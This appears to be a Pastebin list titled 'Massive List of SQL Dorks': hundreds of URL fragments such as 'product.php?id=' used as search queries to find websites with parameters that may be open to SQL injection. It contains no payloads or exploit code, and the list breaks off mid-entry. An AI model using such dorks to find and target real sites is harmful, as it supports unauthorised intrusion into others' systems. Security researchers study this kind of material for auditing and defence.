page.php?area_id= category.php?catid= content.php?cID= newsitem.php?newsid= frontend/category.php?id_category= news/newsitem.php?newsID= things-to-do/detail.php?id= page.php?area_id= page.php?area_id= listing.php?cat= item.php?iid= customer/home.php?cat= staff/publications.php?sn= news/newsitem.php?newsID= library.php?cat= main/index.php?uid= library.php?cat= shop/eventshop/product_detail.php?itemid= news/newsitem.php?newsID= news/newsitem.php?newsID= library.php?cat= FullStory.php?Id= publications.php?ID= publications/book_reviews/full_review.php?id= newsitem.php?newsID= newsItem.php?newsId= site/en/list_service.php?cat= page.php?area_id= product.php?ProductID= releases_headlines_details.php?id= product.php?shopprodid= product.php?productid= product.php?product= product.php?product_id= productlist.php?id= product.php?shopprodid= garden_equipment/pest-weed-control/product.php?pr= product.php?shopprodid= browsepr.php?pr= productlist.php?id= kshop/product.php?productid= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= wiki/pmwiki.php?page****= summary.php?PID= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= 
products.php?categoryID= modules.php?****= message/comment_threads.php?postID= artist_art.php?id= products.php?cat= index.php?option= ov_tv.php?item= index.php?lang= showproduct.php?cat= index.php?lang= product.php?bid= product.php?bid= cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= item_show.php?lid= ?pagerequested= downloads.php?id= print.php?sid= print.php?sid= product.php?intProductID= productList.php?id= product.php?intProductID= more_details.php?id= more_details.php?id= books.php?id= index.php?offs= mboard/replies.php?parent_id= Computer Science.php?id= news.php?id= pdf_post.php?ID= reviews.php?id= art.php?id= prod.php?cat= event_info.php?p= view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= english/board/view****.php?code= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id= view_items.php?id= index.php?pagina= product.php?prodid= notify/notify_form.php?topic_id= php/index.php?id= content.php?cid= product.php?product_id= constructies/product.php?id= detail.php?id= php/index.php?id= index.php?section= product.php?****= show_bug.cgi?id= detail.php?id= bookpage.php?id= product.php?id= today.php?eventid= main.php?item= index.php?cPath= news.php?id= event.php?id= print.php?sid= news/news.php?id= module/range/dutch_windmill_collection.php?rangeId= print.php?sid= show_bug.cgi?id= product_details.php?product_id= products.php?groupid= projdetails.php?id= 
product.php?productid= products.php?catid= product.php?product_id= product.php?prodid= product.php?prodid= newsitem.php?newsID= newsitem.php?newsid= profile.php?id= ********s_in_area.php?area_id= productlist.php?id= productsview.php?proid= rss.php?cat= pub/pds/pds_view.php?start= products.php?rub= ogloszenia/rss.php?cat= print.php?sid= product.php?id= print.php?sid= magazin.php?cid= galerie.php?cid= www/index.php?page= view.php?id= content.php?id= board/read.php?tid= product.php?id_h= news.php?id= index.php?book= products.php?act= reply.php?id= stat.php?id= products.php?cat_id= free_board/board_view.html?page= item.php?id= view_items.php?id= main.php?prodID= gb/comment.php?gb_id= gb/comment.php?gb_id= classifieds/showproduct.php?product= view.php?pageNum_rscomp= cart/addToCart.php?cid= content/pages/index.php?id_cat= content.php?id= display.php?ID= display.php?ID= ponuky/item_show.php?ID= default.php?cPath= main/magpreview.php?id= ***zine/board.php?board= content.php?arti_id= mall/more.php?ProdID= product.php?cat= news.php?id= content/view.php?id= content.php?id= index.php?action= board_view.php?s_board_id= KM/BOARD/readboard.php?id= board_view.html?id= content.php?cont_title= category.php?catid= mall/more.php?ProdID= publications.php?id= irbeautina/product_detail.php?product_id= print.php?sid= index_en.php?id= bid/topic.php?TopicID= news_content.php?CategoryID= front/bin/forumview.phtml?bbcode= cat.php?cat_id= stat.php?id= veranstaltungen/detail.php?id= more_details.php?id= english/print.php?id= print.php?id= view_item.php?id= content/conference_register.php?ID= rss/event.php?id= event.php?id= main.php?id= rtfe.php?siteid= category.php?cid= classifieds/detail.php?siteid= tools/print.php?id= channel/channel-layout.php?objId= content.php?id= resources/detail.php?id= more_details.php?id= detail.php?id= view_items.php?id= content/programme.php?ID= book.php?id= php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s = detail.php?id= default.php?cPath= 
more_details.php?id= php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s = content.php?id= view_items.php?id= default.php?cPath= book.php?id= view_items.php?id= products/parts/detail.php?id= category.php?cid= book.html?isbn= view_item.php?id= picgallery/category.php?cid= detail.php?id= print.php?sid= displayArticleB.php?id= knowledge_base/detail.php?id= bpac/calendar/event.php?id= mb_showtopic.php?topic_id= pages.php?id= content.php?id= exhibition_overview.php?id= singer/detail.php?siteid= Category.php?cid= detail.php?id= print.php?sid= category.php?cid= more_detail.php?X_EID= book.php?ISBN= view_items.php?id= category.php?cid= htmlpage.php?id= story.php?id= tools/print.php?id= print.php?sid= php/event.php?id= print.php?sid= articlecategory.php?id= print.php?sid= ibp.php?ISBN= club.php?cid= view_items.php?id= aboutchiangmai/details.php?id= view_items.php?id= book.php?isbn= blog_detail.php?id= event.php?id= default.php?cPath= product_info.php?products_id= shop_display_products.php?cat_id= print.php?sid= modules/content/index.php?id= printcards.php?ID= events/event.php?ID= more_details.php?id= default.php?TID= general.php?id= detail.php?id= event.php?id= referral/detail.php?siteid= view_items.php?id= event.php?id= view_items.php?id= category.php?id= cemetery.php?id= index.php?cid= content.php?id= exhibitions/detail.php?id= bookview.php?id= edatabase/home.php?cat= view_items.php?id= store/view_items.php?id= print.php?sid= events/event_detail.php?id= view_items.php?id= detail.php?id= pages/video.php?id= about_us.php?id= recipe/category.php?cid= view_item.php?id= en/main.php?id= print.php?sid= More_Details.php?id= category.php?cid= home.php?cat= article.php?id= page.php?id= print-story.php?id= psychology/people/detail.php?id= print.php?sid= print.php?ID= article_preview.php?id= Pages/whichArticle.php?id= view_items.php?id= Sales/view_item.php?id= book.php?isbn= knowledge_base/detail.php?id= gallery/gallery.php?id= event.php?id= detail.php?id= store/home.php?cat= 
view_items.php?id= detail.php?ID= event_details.php?id= detailedbook.php?isbn= fatcat/home.php?view= events/index.php?id= static.php?id= answer/default.php?pollID= news/detail.php?id= view_items.php?id= events/unique_event.php?ID= gallery/detail.php?ID= print.php?sid= view_items.php?id= board/showthread.php?t= book.php?id= event.php?id= more_detail.php?id= knowledge_base/detail.php?id= html/print.php?sid= index.php?id= content.php?ID= Shop/home.php?cat= store/home.php?cat= print.php?sid= gallery.php?id= resources/index.php?cat= events/event.php?id= view_items.php?id= default.php?cPath= content.php?id= products/products.php?p= auction/item.php?id= products.php?cat= clan_page.php?cid= product.php?sku= item.php?id= events?id= comments.php?id= products/?catID= modules.php?****= fshstatistic/index.php?PID= products/products.php?p= sport.php?revista= products.php?p= products.php?openparent= home.php?cat= news/shownewsarticle.php?articleid= discussions/10/9/?CategoryID= trailer.php?id= news.php?id= ?page= index.php?page= item/detail.php?num= features/view.php?id= site/?details&prodid= product_info.php?products_id= remixer.php?id= proddetails_print.php?prodid= pylones/item.php?item= index.php?cont= product.php?ItemId= video.php?id= detail.php?item_id= filemanager.php?delete= news/newsletter.php?id= shop/home.php?cat= designcenter/item.php?id= board/kboard.php?board= index.php?id= board/view_temp.php?table= magazine-details.php?magid= thread.php/id= index.php?y= products.php?sub= products.html?file= xcart/home.php?cat= event.php?contentID= forum/showthread.php?p= model.php?item= product_details.php?prodid= kboard/kboard.php?board= english/index.php?id= products.php?req= search.php?q= products.php?openparent= product.php?id= content.php?op= event_listings_short.php?s= stat.php?id= print.php?id= tutorial.php?articleid= product.php?product= content/view.php?id= phorum/read.php?3,716,721,quote= php/fidEAD6DDC6CC9D1ADDFD7876B7715A3342E18A865C.aspx?s = 
suffering/newssummpopup.php?newscode= kr/product/product.php?gubun= content.php?nID= search***.php?ki= nightlife/martini.php?cid= detail.php?id= discussions/9/6/?CategoryID= seWork.aspx?WORKID= modules.php?****= products.php?cat= products.php?p= cheats/item.php?itemid= index.php?main= modules/xfmod/forum/forum.php?thread_id= downloads.php?type= club.php?cid= content.php?id= forums/search.php?do= mlx/slip_about_sharebacks.php?item= category.php?categoryid= nasar/news.php?id= news.php?id= show.php?item= rmcs/opencomic.phtml?rowid= products.php?cid= index.php?url= showmedia.php?id= lit_work.php?w_id= site_list.php?sort= home.php?cat= joblog/index.php?mode= eng/board/view.php?id= item.php?id= index.php?m= detail.php?id= goods_detail.php?goodsIdx= index.php?str= episode.php?id= link.php?type= resources/detail.php?id= display-product.php?Product= main/viewItem.php?itemid= item.php?iid= index.php?list= products.php?p= subcat.php?catID= htm/item_cat.php?item_id= addcolumn.php?id= cats.php?cat= cats.php?cat= ?page= modules/content/index.php?id= detail.php?cat_id= site/?details&prodid= product.php?lang= modules/wfdownloads/singlefile.php?cid= details.php?prodid= myResources_noBanner.php?categoryID= product.php?id= ppads/external.php?type= store/product.php?productid= detail.php?id= prod_details.php?products_id= board/templete/sycho/input.php?table= cats.php?cat= product/product.php?product_no= search.php?q= record_profile.php?id= index.php?y= view.php?v_id= awards/index.php?input1= jobsite_storage_equipment/view_products.php?p_id= rural/rss.php?cat= calendar.php?event_id= eshop.php?id= content.php?ID= addimage.php?cid= category.php?cid= artist_info.php?artistId= forum/viewtopic.php?TopicID= browse.php?cid= editProduct.php?cid= main/index.php?uid= tutorials/view.php?id= products.php?p= index.php?size= pylones/item.php?item= categories.php?start= portfolio.html?categoryid= forums/showthread.php?t= item.php?code= products.php?cat= TopResources.php?CategoryID= 
opinion.php?option= modify_en.htm?mode= events/detail.php?id= cart/prod_details.php?prodid= html/home/products/product.php?pid= product.php?product_no= auction/item.php?id= cms/showpage.php?cid= touchy/home.php?cat= products.php?sku= fcms/view.php?cid= newsletter/newsletter.php?letter= campkc-view-event.php?Item_ID= forums/index.php?page= products.php?session= view_event.php?eid= product.php?pcid= db/item.html?item= item.php?item_id= order-now.php?prodid= product.php?id= store_prod_details.php?ProdID= products.php?sku= news.php?item= news.php?id= cart/prod_details.php?prodid= products/products.php?p= category.php?cid= specials.php?osCsid= infusions/book_panel/books.php?bookid= special_offers/more_details.php?id= book.php?id= journal.php?id= category.php?cid= News/press_release.php?id= pages/index.php?pID= exclusive.php?pID= shop/pages.php?page= index.php?cPath= shop/index.php?cat_id= artistdetail.php?ID= products_connections_detail.php?cat_id= php/fid27BF3BCB1A648805B511298CE6D643E72B4D59AD.aspx?s = reviews/more_details.php?id= press_release.php?id= product.php?rangeid= knowledgebase/article.php?id= store/index.php?cat_id= news.php?cat_id= Products/products.php?showonly= eng/store/show_scat.php?cat_id= search/index.php?q= news/press_release.php?id= html/print.php?sid= aggregator.php?id= news/shownews.php?article= default.php?cPath= press_release.php?id= book.php?bookid= cubecart/index.php?cat_id= classified/detail.php?siteid= cart/item_show.php?itemID= theater-show.php?id= cube/index.php?cat_id= preorder.php?bookID= category.php?cid= category.php?cat_id= eventsdetail.php?pid= forum/index.php?topic= print.php?sid= article.php?id= html/products.php?id= print.php?sid= read.php?in= index.php?cat_id= top/store.php?cat_id= hearst_journalism/press_release.php?id= press_release.php?id= shop/category.php?cat_id= projectdisplay.php?pid= FREE/poll.php?pid= onlineshop/productView.php?rangeId= more_details.php?id= ********.php?pid= catalog/index.php?cPath= page.php?id= 
index.php?cPath= article_full.php?id= hearst_journalism/press_release.php?id= dump.php?bd_id= Category.php?cid= products.php?cat= store/products.php?cat_id= product.php?cat_id= v/showthread.php?t= melbourne_details.php?id= stdetail.php?prodID= **********/fid17013034EFB2509745A39CD861F4FEA3E716FBE5.aspx?s = print.php?sid= press_release/release_detail.php?id= shop/shop.php?id= news/v.php?id= education.php?id_cat= store/store.php?cat_id= forums/showthread.php?t= news.php?id= events/event-detail.cfm?intNewsEventsID= article.php?id= viewmedia.php?prmMID= magdetail.php?magid= cemetery.php?id= index.php?id_cat= shop/index.php?cPath= view_songs.php?cat_id= shop/products.php?p= shop/index.php?cat_id= tourism/details.php?id= catalog/index.php?cPath= ViewPodcast.php?id= profile.php?objID= item_show.php?itemID= press_releases/press_releases.php?id= print.php?sid= gallery/categoria.php?id_cat= obj/print.php?objId= print.php?sid= nuell/item_show.php?itemID= products/products.php?p= products/item_show.php?itemId= view_ratings.php?cid= press_releases.php?id= main/content.php?id= shop/index.php?cat_id= book.html?isbn= shop/products.php?cat_id= kshop/home.php?cat= section.php?section= bearstore/store.php?cat_id= page_prod.php?id_cat= default.php?cPath= news.php?category= products/product.php?pid= print.php?sid= print.php?sid= show_bug.cgi?id= news.php?articleID= search/index.php?q= bookSingle.php?bookId= weekly/story.php?story_id= index.php?cPath= catalog/index.php?cPath= more_details.php?id= press_release.php?id= store/showcat.php?cat_id= m/content/article.php?content_id= article.php?id= viewstore.php?cat_id= shop.php?id_cat= news/press-announcements/press_release.php?press_id= publication/ontarget_details.php?oid= product_details.php?prodID= print.php?sid= specials.php?osCsid= category_view.php?category_id= book_dete.php?bookID= index.php?cPath= events.php?pid= articles/index.php?id= category.php?cat_id= html/products_cat.php?cat_id= more_details.php?id= preview.php?pid= 
product.php?productid= Product.php?Showproduct= bbs/view.php?tbl= news.php?id= details/food.php?cid= products.php?cat= calendar/week.php?cid= print.php?id= itemlist.php?categoryID= fshstatistic/index.php?&PID= press_release/release_detail.php?id= product.php?prod_num= products.php?page= con_product.php?prodid= mp-prt.php?item= notice/notice_****.php?id= showproducts.php?cid= site/?details&prodid= downloads.php?file_id= products.php?cat_id= product.php?c= campkc-today.php?Start= index.php?page= detail.php?id= shop/product.php?id= classifieds/showproduct.php?product= product-details.php?prodID= gallery/gallery.php?id= adetail.php?id= home.php?cat= store/item.php?id= products.php?cat= detail.php?prodid= links.php?cat= detail.php?prodid= videos/view.php?id= resources/index.php?cat= dream_interpretation.php?id= category.php?category_id= html/gallery.php?id= item.php?id= category.php?ID= knowledge_base/detail.php?id= home.php?cat= gallery.php?id= category.php?c= index.php?area_id= games/play.php?id= tutorial.php?articleid= directory/showcat.php?cat= gallery/gallery.php?id= news/newsitem.php?newsID= site/public/newsitem.php?newsID= index.php?cat= newsitem.php?newsID= category.php?catid= gallery.php?id= content.php?id= resources/category.php?CatID= media.php?****= store/detail.php?prodid= display_page.php?tpl= calendar/item.php?id= item-menu.php?idSubCat= Blog/viewpost.php?id= news/newsitem.php?newsID= detail.php?prodid= printarticle.php?id= article.php?id= category.php?id= page.php?id= detail.php?prodid= links/resources/links_search_result.php?catid= news_view.php?id= item.php?id= display_page.php?elementId= photog.php?id= home.php?cat= categories.php?catid= categories.php?parent_id= index.php?product= category.php?catId= cm/public/news/news.php?newsid= content.php?page= volunteers/item.php?id= ressource.php?ID= extensions/extlist.php?cat= category.php?id= cms/publications.php?id= page.php?id= offer_info.php?id= cart/detail_prod.php?id= directory.php?cat= 
Shop/home.php?cat= categories.php?cat= newsitem.php?newsid= shareit/readreviews.php?cat= categories.php?cat= item.php?sub_id= index.php?area_id= category.php?catid= item.php?sub_id= index.php?area_id= now_viewing.php?id= categories.php?cat= publications/?id= carry-detail.php?prodID= tools/tools_cat.php?c= detail.php?prodid= gallery/mailmanager/subscribe.php?ID= painting.php?id= Catalog_View_Summary.php?ID= categories.php?parent_id= product-detail.php?prodid= newsitem.php?newsid= liblog/index.php?cat= cart/prod_subcat.php?id= goto.php?area_id= catalog.php?CAT= showthread.php?t= category.php?id= item.php?item= site/cat.php?setlang= item.php?id= videos/view.php?id= item.php?SKU= display_page.php?id= index.php?id= faq/category.php?id= news/newsitem.php?newsid= cat.php?cat= review.php?id= knowledgebase/article.php?id= forums/showthread.php?t= product_info.php?products_id= cart/home.php?cat= item.php?id= board/viewtopic.php?id= page.php?id= english/gallery.php?id= detail.php?prodid= detail.php?prodid= item.php?item_id= article.php?ID= categories.php?cat= media.php?****= home.php?cat= gallery/gallery.php?id= library.php?author= item.php?cat= cart/home.php?cat= vb/showthread.php?p= news-item.php?id= ads/index.php?cat= item.php?code= kids-detail.php?prodID= index.php?id= category.php?id= addsiteform.php?catid= categories.php?cat= newshop/category.php?c= news/news-item.php?id= product.php?proid= catalog/product_info.php?products_id= products.php?cat= product.php?productid= browsepr.php?pr= products.php?cat= productDetail.php?prodId= productDetail.php?prodId= product.php?products_id= product.php?productid= browsepr.php?pr= product.php?ProductID= product-details.php?prodId= product_details.php?prodid= product_info.php?products_id= product.php?id= browsepr.php?pr= products.php?cat= product_details.php?product_id= products.php?cat= product.php?proid= productlist.php?tid= products.php?cat= product_details.php?product_id= products/product.php?article= products.php?cid= 
forums/showthread.php?t= show_prod.php?p= new/showproduct.php?prodid= product.php?productid= prod.php?Cat= productlist.php?fid= product.php?pl= product.php?proID= product_details.php?product_id= PCMA/productDetail.php?prodId= product.php?proid= panditonline/productlist.php?id= productlist.php?id= js_product_detail.php?pid= prod.php?cat= poem.php?id= estore/products.php?cat= summary.php?PID= productdetails.php?prodId= product-details.php?prodID= en/product.php?proid= product-list.php?ID= main/product.php?productid= product.php?product= site/catalog.php?cid= resources/index.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= Products/product.php?pid= clear/store/products.php?product_category= earth/visitwcm_view.php?id= products.php?categoryID= product.php?productid= products/products.php?cat= product.php?pid= product.php?proid= home.php?cat= html/projdetail.php?id= products/index.php?cat= productDetails.php?prodId= proddetail.php?prod= product.php?productid= products.php?subgroupid= product_info.php?products_id= prod.php?cat= product_detail.php?prodid= discont_productpg.php?product_id= giftshop/product.php?proid= products.php?cat= product.php?product_id= shop/products.php?cat= product_info.php?products_id= products.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= productlist.php?id= products.php?cat= product_customed.php?pid= products.php?cat= productlist.php?id= product.php?id= materials/item_detail.php?ProductID= products/productdetails.php?prodID= product_details.php?product_id= products.php?cat= projDetail.php?id= main/product.php?productid= product_details.php?product_id= product.php?proid= ProductDetails.php?ProdID= store/product.php?productid= x/product.php?productid= product.php?productid= product.php?id= iam/tabbedWithShowcase.php?pid= reviews/index.php?cat= product.php?productid= product.php?pid= product.php?proid= mhp/my***.php?hls= xcart/product.php?productid= products.php?cat= xcart/product.php?productid= productlist.php?id= 
product_info.php?products_id= productlist.php?cat= prodrev.php?cat= productlist.php?id= projdetail.php?id= store/customer/product.php?productid= product.php?product_id= product.php?productid= products.php?cat= cats_disp.php?cat= product.php?product_id= productdetails.php?prodid= product_details.php?product_id= product_details.php?product_id= product.php?id= productlist.php?tid= ddoecom/product.php?proid= proddetail.php?prod= productlist.php?fid= products.php?cat= Products/Catsub.php?recordID= Products/mfr.php?mfg= site/catalog.php?pid= shop/product_details.php?ProdID= usar/productDetail.php?prodID= products/display_product.php?product_id= products.php?cat= cardIssuance/product.php?pid= product.php?proid= products.php?parent= products.php?catId= productDetail.php?prodID= productlist.php?fid= products.php?mainID= products.php?cat= product_info.php?products_id= product_detail.php?prodid= catalog/product_info.php?products_id= product_info.php?products_id= products.php?cat= product.search.php?proid= productlist.php?id= product.php?proid= product.php?pid= product_reviews.php?feature_id= product.php?product_id= product.php?productid= item.php?id= directorylisting.php?cat= historical/st Link: Massive List of SQL Dorks - Pastebin.com